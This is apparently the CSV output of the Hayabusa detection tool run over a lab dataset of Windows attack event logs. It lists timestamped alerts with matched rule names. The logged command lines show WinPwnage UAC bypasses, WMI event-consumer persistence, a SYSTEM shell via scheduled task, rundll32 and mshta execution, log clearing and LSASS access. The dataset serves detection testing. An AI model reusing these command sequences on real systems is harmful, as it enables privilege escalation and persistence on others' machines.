2019-05-10 22:49:29.586 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:39.930 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:40.164 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:45.133 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:45.378 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-11 18:50:08.248 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:13.494 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:18.404 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:18.654 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:26.779 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:27.018 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-12 01:46:10.125 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:15.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:20.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:20.828 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:54:02.071 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:07.508 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:12.493 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:12.821 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x1bbdce : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:28:17.176 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:19.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini : Path: C:\Windows\System32\cmstp.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:22.598 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:57:49.903 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:22.809 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.215 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.450 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.590 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:50.090 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.887 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:55.028 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:55.153 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 03:10:42.434 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
2019-05-12 03:10:42.668 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
2019-05-12 09:32:24.461 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:35.258 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:35.352 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:40.342 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 22:30:32.931 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:30:46.400 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:30:46.556 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:32:58.167 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:37.078 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:59.743 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.523 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
